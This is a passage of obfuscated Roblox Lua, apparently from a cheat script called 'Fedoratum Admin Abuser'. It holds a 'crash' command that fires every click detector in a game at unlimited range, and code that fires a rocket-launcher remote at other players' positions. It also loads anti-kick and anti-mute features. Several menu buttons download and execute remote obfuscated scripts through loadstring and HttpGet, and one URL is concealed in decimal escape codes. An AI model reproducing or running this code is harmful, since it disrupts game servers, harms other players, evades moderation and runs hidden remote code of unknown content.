do local v465=0;local v466;local v467;while true do if (v465==1) then while true do if (v466==0) then v467={[1]=game.Players[v461].Character.HumanoidRootPart.Position-Vector3.new(0,1,0) ,[2]=game.Players[v461].Character.HumanoidRootPart.Position};v168.Backpack.RocketJumper.FireRocket:FireServer(unpack(v467));break;end end break;end if (v465==0) then v466=0;v467=nil;v465=1;end end end end);end end v449=2;end end end);break;end end elseif (v262:sub(1,6)==(AdminPrefix   .. "crash")) then spawn(function()while wait() do if fireclickdetector then for v458,v459 in pairs(workspace:GetDescendants()) do if v459:IsA("ClickDetector") then local v462=0;local v463;while true do if (v462==0) then v463=0;while true do if (v463==0) then v459.MaxActivationDistance=math.huge;fireclickdetector(v459);break;end end break;end end end end end end end);end end);v23.MouseButton1Click:Connect(function()local v263=0;local v264;local v265;while true do if (v263==1) then while true do if (v264==0) then v265=0;while true do if (v265==0) then v12:Destroy();v172=false;v265=1;end if (v265==2) then local v356=0;while true do if (v356==1) then v265=3;break;end if (v356==0) then local v375=0;while true do if (v375==0) then v182=false;v181=true;v375=1;end if (1==v375) then v356=1;break;end end end end end if (v265==1) then local v357=0;while true do if (v357==0) then v170=false;v171=false;v357=1;end if (v357==1) then v265=2;break;end end end if (v265==4) then v178:Disconnect();v175:Disconnect();break;end if (v265==3) then v183=false;v180=false;v265=4;end end break;end end break;end if (v263==0) then v264=0;v265=nil;v263=1;end end end);Notify("Fedoratum Admin Abuser","Anti Kick And Mute Loaded",4);task.wait(4);Notify("Fedoratum Admin Abuser","Type prefix(customcmds) to see custom commands",4);end});local v5=v3:AddSection({Name="Mod"});v3:AddButton({Name="Auto Walk Mod",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Auto%20Walk%20Obfuscator"))();end});v3:AddButton({Name="ModFly",Callback=function()loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();end});local v5=v3:AddSection({Name="Player speed and height settings"});v3:AddButton({Name="Walkspeed",Callback=function()game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=100;end});v3:AddButton({Name="High Jump",Callback=function()game.Players.LocalPlayer.Character.Humanoid.JumpPower=150;end});v3:AddButton({Name="Reset height and walk to default",Callback=function()local v186=0;local v187;while true do if (v186==0) then v187=0;while true do if (v187==0) then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=16;game.Players.LocalPlayer.Character.Humanoid.JumpPower=50;break;end end break;end end end});local v6=v2:AddSection({Name="Mod may been not work properly sometimes in mobiles"});v2:AddButton({Name="Auto Walk",Callback=function(v188)loadstring(game:HttpGet("https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Auto%20Walk%20Obfuscator"))();end});v2:AddButton({Name="ModFly",Callback=function()loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();end});v6=v2:AddSection({Name="Slide Menu Not Work , Sorry :("});v2:AddSlider({Name="Walk speed",Min=0,Max=100,Default=16,Color=Color3.fromRGB(255,255,255),Increment=1,ValueName="WS",Callback=function(v189)game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v189;end});v2:AddSlider({Name="Jump Height.",Min=0,Max=100,Default=50,Color=Color3.fromRGB(255,255,255),Increment=1,ValueName="Height",Callback=function(v191)game.Players.LocalPlayer.Character.Humanoid.JumpPower=v191;end});v0:Init();end end